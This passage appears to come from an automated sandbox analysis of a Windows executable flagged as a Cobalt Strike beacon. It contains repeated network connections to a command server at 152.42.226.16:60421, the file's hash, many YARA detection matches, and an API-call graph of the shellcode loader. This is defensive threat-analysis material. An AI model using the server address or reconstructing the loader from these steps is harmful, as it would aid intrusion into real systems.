                      Dec 26, 2024 19:31:10.043561935 CET6042150070152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:10.044002056 CET6042150071152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:10.044069052 CET5007160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:10.049017906 CET5007160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:10.168930054 CET6042150071152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:10.168984890 CET5007160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:10.170008898 CET5007260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:10.696768999 CET6042150071152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:10.697154999 CET6042150072152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:10.697632074 CET5007160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:10.697638035 CET5007260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:10.701499939 CET5007260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:10.817264080 CET6042150071152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:10.821233988 CET6042150072152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:13.396343946 CET6042150072152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:13.399827957 CET5007260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:13.399827957 CET5007260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:13.403810024 CET5007360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:13.519473076 CET6042150072152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:13.523346901 CET6042150073152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:13.523565054 CET5007360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:13.524194956 CET5007360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:13.643718958 CET6042150073152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:16.207871914 CET6042150073152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:16.207923889 CET5007360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:16.208370924 CET5007360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:16.208956003 CET5007460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:16.327939034 CET6042150073152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:16.328690052 CET6042150074152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:16.328762054 CET5007460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:16.328970909 CET5007460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:16.448805094 CET6042150074152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:16.448853016 CET5007460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:16.451211929 CET5007560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:16.570825100 CET6042150075152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:16.571012974 CET5007560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:16.571527958 CET5007560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:16.691016912 CET6042150075152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:19.240617990 CET6042150075152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:19.241637945 CET5007560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:19.241677999 CET5007560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:19.244692087 CET5007660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:19.361469984 CET6042150075152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:19.364304066 CET6042150076152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:19.365695000 CET5007660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:19.369529009 CET5007660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:19.489285946 CET6042150076152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:22.021003962 CET6042150076152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:22.021081924 CET5007660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:22.021231890 CET5007660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:22.022416115 CET5007760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:22.140763998 CET6042150076152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:22.141942978 CET6042150077152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:22.142014027 CET5007760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:22.142159939 CET5007760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:22.262013912 CET6042150077152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:22.262067080 CET5007760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:22.265098095 CET5007860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:22.385057926 CET6042150078152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:22.385143042 CET5007860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:22.385929108 CET5007860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:22.505527973 CET6042150078152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:25.036911964 CET6042150078152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:25.037679911 CET5007860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:25.037679911 CET5007860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:25.041539907 CET5007960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:25.157344103 CET6042150078152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:25.161035061 CET6042150079152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:25.161636114 CET5007960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:25.164397955 CET5007960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:25.284032106 CET6042150079152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:27.833534002 CET6042150079152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:27.833597898 CET5007960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:27.833687067 CET5007960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:27.834366083 CET5008060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:27.956294060 CET6042150079152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:27.956926107 CET6042150080152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:27.956986904 CET5008060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:27.957204103 CET5008060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:28.076426983 CET5008160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:28.076906919 CET6042150080152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:28.076956034 CET5008060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:28.199776888 CET6042150081152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:28.199873924 CET5008160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:28.200428009 CET5008160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:28.321937084 CET6042150081152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:30.864404917 CET6042150081152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:30.865629911 CET5008160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:30.866902113 CET5008160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:30.866904974 CET5008260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:30.986505985 CET6042150081152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:30.986524105 CET6042150082152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:30.986685038 CET5008260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:30.989532948 CET5008260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:31.112251997 CET6042150082152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:33.847800016 CET6042150082152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:33.847855091 CET5008260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:33.847929001 CET5008260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:33.848685026 CET5008360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:33.969029903 CET6042150082152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:33.969043016 CET6042150083152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:33.969125032 CET5008360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:33.969296932 CET5008360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.092747927 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.093858004 CET6042150083152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:34.093924999 CET5008360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.213227987 CET6042150084152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:34.213304043 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.213939905 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.333492041 CET6042150084152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:36.927376986 CET6042150084152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:36.927589893 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:36.927670956 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:36.929544926 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:37.047439098 CET6042150084152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:37.049271107 CET6042150085152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:37.049406052 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:37.049853086 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:37.169433117 CET6042150085152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.709429979 CET6042150085152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.709512949 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.709583044 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.710556984 CET5008660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.829154015 CET6042150085152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.830018044 CET6042150086152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.830105066 CET5008660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.830271006 CET5008660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.950159073 CET6042150086152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.950223923 CET5008660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.959573984 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:40.079215050 CET6042150087152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:40.079287052 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:40.079592943 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:40.199258089 CET6042150087152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:42.740477085 CET6042150087152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:42.740586042 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.757554054 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.757559061 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.877315044 CET6042150087152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:42.877332926 CET6042150088152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:42.878153086 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.878153086 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.997911930 CET6042150088152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.536788940 CET6042150088152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.537683010 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.537683010 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.545841932 CET5008960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.661514997 CET6042150088152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.669187069 CET6042150089152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.669745922 CET5008960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.669745922 CET5008960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.789937973 CET6042150089152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.790005922 CET5008960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.814285040 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.933875084 CET6042150090152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.933950901 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.934499025 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:46.053988934 CET6042150090152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:48.599570990 CET6042150090152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:48.599639893 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.599781036 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.600537062 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.719388008 CET6042150090152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:48.720154047 CET6042150091152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:48.720670938 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.720670938 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.840255976 CET6042150091152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.390285969 CET6042150091152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.390562057 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.390631914 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.391331911 CET5009260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.510675907 CET6042150091152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.511192083 CET6042150092152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.511333942 CET5009260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.511517048 CET5009260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.631330967 CET6042150092152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.631378889 CET6042150092152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.631443977 CET5009260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.637717962 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.956990957 CET6042150093152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.957125902 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.957540989 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:52.077022076 CET6042150093152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:54.637913942 CET6042150093152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:54.641776085 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.641836882 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.642388105 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.761456013 CET6042150093152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:54.761912107 CET6042150094152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:54.762020111 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.762747049 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.882253885 CET6042150094152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.486073017 CET6042150094152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.486140966 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.486217022 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.486892939 CET5009560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.606386900 CET6042150094152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.607075930 CET6042150095152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.607151985 CET5009560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.607409954 CET5009560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.716885090 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.727384090 CET6042150095152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.727462053 CET6042150095152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.727544069 CET5009560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.836455107 CET6042150096152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.840156078 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.840156078 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.959810972 CET6042150096152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:00.490613937 CET6042150096152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:00.493645906 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.493732929 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.497579098 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.614027977 CET6042150096152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:00.617640018 CET6042150097152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:00.621993065 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.621993065 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.741863966 CET6042150097152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.287889004 CET6042150097152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.287961960 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.288053989 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.288810968 CET5009860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.407668114 CET6042150097152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.408334970 CET6042150098152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.408488989 CET5009860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.408626080 CET5009860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.528512955 CET6042150098152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.528577089 CET5009860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.529782057 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.649765968 CET6042150099152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.649857998 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.650333881 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.770154953 CET6042150099152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:06.302364111 CET6042150099152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:06.302484989 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:06.304622889 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:06.424221992 CET6042150099152.42.226.16192.168.2.5

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:13:27:57
                      Start date:26/12/2024
                      Path:C:\Users\user\Desktop\121.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\121.exe"
                      Imagebase:0x400000
                      File size:328'704 bytes
                      MD5 hash:3B8F4AE6DD1EF9625F8BA8F6C9EB8515
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                      • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                      • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                      • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                      • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:false

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:1.9%
                        Dynamic/Decrypted Code Coverage:77.3%
                        Signature Coverage:10.3%
                        Total number of Nodes:321
                        Total number of Limit Nodes:18
                        execution_graph 37218 4014c0 37223 401990 37218->37223 37220 4014d6 37227 401180 37220->37227 37222 4014db 37224 4019d0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 37223->37224 37225 4019b9 37223->37225 37226 401a2b 37224->37226 37225->37220 37226->37220 37228 401460 GetStartupInfoA 37227->37228 37229 4011b4 37227->37229 37231 4013b4 37228->37231 37230 4011e1 Sleep 37229->37230 37232 4011f6 37229->37232 37230->37229 37231->37222 37232->37231 37233 401229 37232->37233 37234 40142c _initterm 37232->37234 37245 401fd0 37233->37245 37234->37233 37236 401251 SetUnhandledExceptionFilter 37265 4024e0 37236->37265 37238 40130e malloc 37239 401335 37238->37239 37240 40137b 37238->37240 37242 401340 strlen malloc memcpy 37239->37242 37271 403040 37240->37271 37241 40126d 37241->37238 37242->37242 37243 401376 37242->37243 37243->37240 37250 402008 37245->37250 37264 401ff2 37245->37264 37246 402240 37248 40223a 37246->37248 37246->37264 37247 4021ce 37252 40228c 37247->37252 37276 401dc0 8 API calls 37247->37276 37248->37246 37248->37252 37278 401dc0 8 API calls 37248->37278 37249 4022a8 37280 401d50 8 API calls 37249->37280 37250->37246 37250->37247 37250->37249 37259 4020b0 37250->37259 37250->37264 37279 401d50 8 API calls 37252->37279 37256 402208 37277 401dc0 8 API calls 37256->37277 37257 4022b4 37257->37236 37259->37247 37259->37252 37259->37256 37260 401dc0 8 API calls 37259->37260 37261 402156 37259->37261 37262 402160 37259->37262 37260->37259 37261->37262 37263 402192 VirtualProtect 37262->37263 37262->37264 37263->37262 37264->37236 37267 4024ef 37265->37267 37266 40251c 37266->37241 37267->37266 37281 402a80 strncmp 37267->37281 37269 402517 37269->37266 37270 4025c5 RtlAddFunctionTable 37269->37270 37270->37266 37272 40304a 37271->37272 37282 4017f8 GetTickCount 37272->37282 37275 403058 SleepEx 37275->37275 37276->37256 37277->37248 37278->37248 37279->37249 37280->37257 37281->37269 37283 402e28 37282->37283 37284 401866 CreateThread 37283->37284 37285 4017a6 malloc 37284->37285 37300 4016e6 37284->37300 37286 4017c8 SleepEx 37285->37286 37292 401704 CreateFileA 37286->37292 37289 4017de 37297 401595 VirtualAlloc 37289->37297 37291 4017ed 37291->37275 37293 40179c 37292->37293 37294 40175e 37292->37294 37293->37286 37293->37289 37295 401781 CloseHandle 37294->37295 37296 401762 ReadFile 37294->37296 37295->37293 37296->37294 37296->37295 37298 4015c7 37297->37298 37299 4015e8 VirtualProtect CreateThread 37298->37299 37299->37291 37303 401630 CreateNamedPipeA 37300->37303 37304 4016dc 37303->37304 37305 40168f ConnectNamedPipe 37303->37305 37305->37304 37306 4016a3 37305->37306 37307 4016c6 CloseHandle 37306->37307 37308 4016a7 WriteFile 37306->37308 37307->37304 37308->37306 37308->37307 37309 a488d4 37310 a48961 37309->37310 37315 a49324 37310->37315 37312 a48a01 37319 a496b4 37312->37319 37314 a48a8f 37318 a4935e 37315->37318 37316 a49455 VirtualAlloc 37317 a49479 37316->37317 37317->37312 37318->37316 37318->37317 37322 a49723 37319->37322 37320 a4994f 37320->37314 37321 a4976e LoadLibraryA 37321->37322 37322->37320 37322->37321 37323 d01b48 37324 d01b64 37323->37324 37328 d01b69 37323->37328 37337 d092d0 GetSystemTimeAsFileTime GetCurrentProcessId QueryPerformanceCounter _getptd_noexit 37324->37337 37326 d01bbe 37327 d01bf4 37327->37326 37339 cf93e0 37327->37339 37328->37326 37328->37327 37338 d019e8 114 API calls 16 library calls 37328->37338 37330 d01c12 37332 d01c3b 37330->37332 37334 cf93e0 _DllMainCRTStartup 199 API calls 37330->37334 37332->37326 37348 d019e8 114 API calls 16 library calls 37332->37348 37335 d01c2e 37334->37335 37347 d019e8 